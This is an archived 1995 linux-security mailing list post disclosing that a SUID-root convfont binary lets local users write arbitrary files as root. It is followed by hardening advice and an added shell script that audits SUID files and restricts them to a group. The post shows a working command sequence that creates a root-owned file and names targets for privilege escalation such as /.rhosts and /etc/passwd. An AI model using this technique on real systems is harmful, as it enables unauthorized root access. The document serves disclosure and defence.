[73] in linux-security and linux-alert archive
Re: Secure setup for file transfer
daemon@ATHENA.MIT.EDU (Panzer Boy)
Thu Mar 9 09:04:42 1995
To: linux-security@tarsier.cv.nrao.edu
From: panzer@dhp.com (Panzer Boy)
Date: 9 Mar 1995 00:55:03 -0500
Reply-To: linux-security@tarsier.cv.nrao.edu
Mr Martin J Hargreaves (ch11mh@surrey.ac.uk) wrote:
: On 7 Mar 1995, Panzer Boy wrote:
: > OB linux-security, SVGAlib with convfont being SUID root. Allows you to
: > write any files as root.
: Is this list going to be full disclosure like bugtraq? If so can
: we have details? Otherwise do you have a fix (other than only running
: SVGAlib programs as root).
I'm not sure about full disclosure, as I don't run this list, nor do I
think that we should discuss the merits of non vs. full, as this will
make more posts than the shadow discussion. If you have other security
problems like this, please post.
convfont text-file <LENGTH-OF-TEXT-FILE> /anyfile
Here:
> echo >/tmp/file "Hello"
> ls -l /tmp/file
-rw------- 1 panzer users 6 Mar 9 00:02 /tmp/file
> ls -l /usr/local/bin/convfont
-rwsr-xr-x 1 root users 2272 May 26 1994 /usr/local/bin/convfont*
> /usr/local/bin/convfont /tmp/file 6 /tmp/new-root-file
Converting 1 characters
Writing font file.
> ls -l /tmp/new-root-file
-rw------- 1 root users 8192 Mar 9 00:03 /tmp/new-root-file
/tmp/new-root-file is "Hello" followed by a lot of space. Instant
/.rhosts, /etc/passwd(shadow), hosts, inetd.conf, anything.
If you are concerned about security start with the simple standby:
find / -perm -4000 -print
This will search your entire drive for any SUID programs. Make sure that
all of these need to be SUID. If you have SVGA stuff, make a "lusers" group for
"Local Users" and chmod 4750 those files. People who telnet in have no
reason to run svgalib progs. Change your x-servers to the same
permission; again, non-local users should not be starting X on your machine.
Look in /etc/inetd.conf. Make sure you are only allowing access to
things you want to give out access to. If in doubt, comment it out and
see if you need it; you can always put it back.
--
-Matt (panzer@dhp.com) DI-1-9026
"That which can never be enforced should not be prohibited."
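
The audit and the group restriction suggested in the message above, as an added example that is not part of the original post. The function names suid_audit and restrict_suid and the allowlist file (one reviewed path per line) are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: review SUID files under a tree and restrict them to a group.
# Assumption: file names contain no newlines.

# suid_audit ROOT [ALLOWLIST]
# Prints one line per SUID file: SCOPE STATUS PATH
#   SCOPE  = WORLD       any account on the machine can execute it
#            RESTRICTED  only the owner and/or group can execute it
#   STATUS = approved    path is listed in ALLOWLIST (hypothetical review file)
#            UNREVIEWED  nobody has confirmed it needs to be SUID
suid_audit() {
    root=$1
    allow=${2:-/dev/null}
    # -xdev keeps the scan on one filesystem; -perm -4000 matches the SUID bit.
    find "$root" -xdev -type f -perm -4000 -print | sort |
    while IFS= read -r f; do
        # Is the "other" execute bit set on this file?
        if [ -n "$(find "$f" -prune -perm -0001 -print)" ]; then
            scope=WORLD
        else
            scope=RESTRICTED
        fi
        # Exact, whole-line match against the reviewed list.
        if grep -Fxq -- "$f" "$allow"; then
            status=approved
        else
            status=UNREVIEWED
        fi
        printf '%s %s %s\n' "$scope" "$status" "$f"
    done
}

# restrict_suid GROUP FILE...
# Applies the "chmod 4750" advice: only members of GROUP (for example a
# local-users group) keep execute access. chgrp runs first because changing
# ownership can clear the SUID bit, which chmod then sets again.
restrict_suid() {
    group=$1
    shift
    chgrp "$group" "$@" && chmod 4750 "$@"
}
```

Run suid_audit / as root to cover the whole drive, then pass each WORLD line that only local users need to restrict_suid.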